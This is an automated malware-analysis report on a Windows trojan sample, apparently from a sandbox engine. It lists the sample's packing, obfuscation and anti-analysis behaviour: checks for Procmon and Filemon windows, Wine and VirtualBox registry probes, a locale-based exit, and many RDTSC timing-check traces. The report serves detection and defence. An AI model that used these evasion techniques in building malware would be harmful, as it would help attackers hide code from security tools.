              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: smsoyiwh ZLIB complexity 0.9946275893392269
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_007D3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007CCAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\35M6IBBY.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1814528 > 1048576
              Source: file.exeStatic PE information: Raw size of smsoyiwh is bigger than: 0x100000 < 0x1a1200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;smsoyiwh:EW;mwymltiy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;smsoyiwh:EW;mwymltiy:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1bdec2 should be: 0x1c57c3
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: smsoyiwh
              Source: file.exeStatic PE information: section name: mwymltiy
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9F8A9 push eax; mov dword ptr [esp], ecx0_2_00B9F8C6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9F8A9 push 47E92CEEh; mov dword ptr [esp], eax0_2_00BA02C1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A0D8 push ebp; mov dword ptr [esp], esi0_2_00C0A168
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0A0D8 push edx; mov dword ptr [esp], ebp0_2_00C0A17E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF409F push esi; mov dword ptr [esp], ecx0_2_00BF40C3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF409F push edi; mov dword ptr [esp], ebp0_2_00BF411C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF5897 push 7BD77007h; mov dword ptr [esp], eax0_2_00BF5952
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF5897 push 50B89249h; mov dword ptr [esp], edi0_2_00BF596C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF5897 push edx; mov dword ptr [esp], eax0_2_00BF59BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0589A push 7AB4378Bh; mov dword ptr [esp], edi0_2_00B058F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0589A push ebp; mov dword ptr [esp], eax0_2_00B0592B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0589A push 75EFEA89h; mov dword ptr [esp], edx0_2_00B05973
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0589A push 1A8DAADDh; mov dword ptr [esp], edx0_2_00B0599E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C248F1 push esi; mov dword ptr [esp], 53ECCE2Eh0_2_00C24911
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C248F1 push 26104C27h; mov dword ptr [esp], ecx0_2_00C24930
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1F089 push esi; mov dword ptr [esp], edi0_2_00C1F11A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1F089 push 40EBDF52h; mov dword ptr [esp], ecx0_2_00C1F14B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7C89E push edi; mov dword ptr [esp], ebx0_2_00C7C8C2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7C89E push edi; mov dword ptr [esp], 7E77496Ch0_2_00C7C8D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA90F1 push eax; mov dword ptr [esp], esi0_2_00AA9105
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA90F1 push 077383C2h; mov dword ptr [esp], ecx0_2_00AA916A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA90F1 push 3E0A863Bh; mov dword ptr [esp], ecx0_2_00AA9206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA90F1 push 371047D7h; mov dword ptr [esp], ecx0_2_00AA927C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1789A push ebx; mov dword ptr [esp], 665C7FEFh0_2_00C1789E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1789A push edi; mov dword ptr [esp], esi0_2_00C178CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push eax; mov dword ptr [esp], 08F7F816h0_2_00B6B186
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push edi; mov dword ptr [esp], eax0_2_00B6B220
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push 7A4E02FBh; mov dword ptr [esp], ebp0_2_00B6B2AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push 4CFCFB13h; mov dword ptr [esp], ebp0_2_00B6B473
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push ebx; mov dword ptr [esp], 6D77EFE7h0_2_00B6B49A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6B0DE push esi; mov dword ptr [esp], ecx0_2_00B6B4AE
              Source: file.exeStatic PE information: section name: smsoyiwh entropy: 7.952862175295011

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007D6390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26135
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B778A5 second address: B778C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F0B48B8DEECh 0x0000000d jne 00007F0B48B8DEE6h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B778C0 second address: B778DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F39h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FD66 second address: B6FD91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B48B8DEE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F0B48B8DEE8h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0B48B8DEF3h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FD91 second address: B6FDAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F0B48765F26h 0x00000010 jmp 00007F0B48765F2Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FDAF second address: B6FDB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B48B8DEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B771B8 second address: B771C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7893A second address: 9FFB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F0B48B8DEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 57BE1E1Bh 0x00000015 mov dword ptr [ebp+122D2C9Dh], ecx 0x0000001b push dword ptr [ebp+122D0BD9h] 0x00000021 movsx esi, dx 0x00000024 call dword ptr [ebp+122D1A63h] 0x0000002a pushad 0x0000002b add dword ptr [ebp+122D1B47h], ebx 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1C6Bh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F0B48B8DEF3h 0x00000042 mov dword ptr [ebp+122D36CAh], eax 0x00000048 stc 0x00000049 stc 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F0B48B8DEF2h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D1AE6h], edx 0x0000005e lodsw 0x00000060 or dword ptr [ebp+122D1AE6h], eax 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007F0B48B8DEF7h 0x0000006f jmp 00007F0B48B8DEF3h 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007e push eax 0x0000007f push ebx 0x00000080 push esi 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78A60 second address: B78A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B48765F30h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78A8E second address: B78A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B48B8DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78D25 second address: B78D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 654335BFh 0x0000000d mov dword ptr [ebp+122D1AA3h], edx 0x00000013 mov dword ptr [ebp+122D1B1Eh], ecx 0x00000019 lea ebx, dword ptr [ebp+1244C894h] 0x0000001f js 00007F0B48765F27h 0x00000025 xchg eax, ebx 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78D51 second address: B78D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997F4 second address: B997FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997FA second address: B9980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B48B8DEEAh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9980B second address: B99811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C726 second address: B6C73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B976DA second address: B976DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B979C3 second address: B979E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0B48B8DEE6h 0x00000009 jmp 00007F0B48B8DEF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B979E3 second address: B97A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F0B48765F4Dh 0x0000000d jmp 00007F0B48765F39h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97A0D second address: B97A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97DF5 second address: B97DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97DF9 second address: B97E04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97E04 second address: B97E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B48765F26h 0x0000000a ja 00007F0B48765F26h 0x00000010 jmp 00007F0B48765F2Ch 0x00000015 popad 0x00000016 jmp 00007F0B48765F2Fh 0x0000001b js 00007F0B48765F28h 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F0B48765F26h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97F99 second address: B97FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0B48B8DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F0B48B8DEE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97FAE second address: B97FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97FB4 second address: B97FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0B48B8DEF9h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98271 second address: B98275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98275 second address: B9827B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9827B second address: B98286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98286 second address: B982A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0B48B8DEF8h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B982A8 second address: B982D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0B48765F36h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B982D1 second address: B982D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B986E1 second address: B986E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B986E9 second address: B9870F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0B48B8DEEFh 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jno 00007F0B48B8DEE6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9870F second address: B98713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98838 second address: B98847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F0B48B8DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98847 second address: B9885D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F2Eh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9885D second address: B98863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62571 second address: B62577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62577 second address: B625A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0B48B8DEF0h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B625A3 second address: B625A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98F52 second address: B98F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0B48B8DEE6h 0x0000000f jng 00007F0B48B8DEE6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9E407 second address: B9E40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B640C0 second address: B640E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B48B8DEEEh 0x0000000a ja 00007F0B48B8DEE6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F0B48B8DEEBh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2476 second address: BA24A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0B48765F31h 0x0000000a js 00007F0B48765F26h 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0EB8 second address: BA0ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F0B48B8DEF4h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA0ED9 second address: BA0EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA25B6 second address: BA25DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48B8DEF5h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0B48B8DEECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA25DB second address: BA25DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2767 second address: BA276B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA580B second address: BA582C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0B48765F2Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA582C second address: BA585D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF4h 0x00000007 jmp 00007F0B48B8DEF1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F0B48B8DEE6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8FCD second address: BA8FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8FD1 second address: BA8FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8FD7 second address: BA8FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0B48765F26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9EB8 second address: BA9EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9F51 second address: BA9FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F0B48765F28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jns 00007F0B48765F40h 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
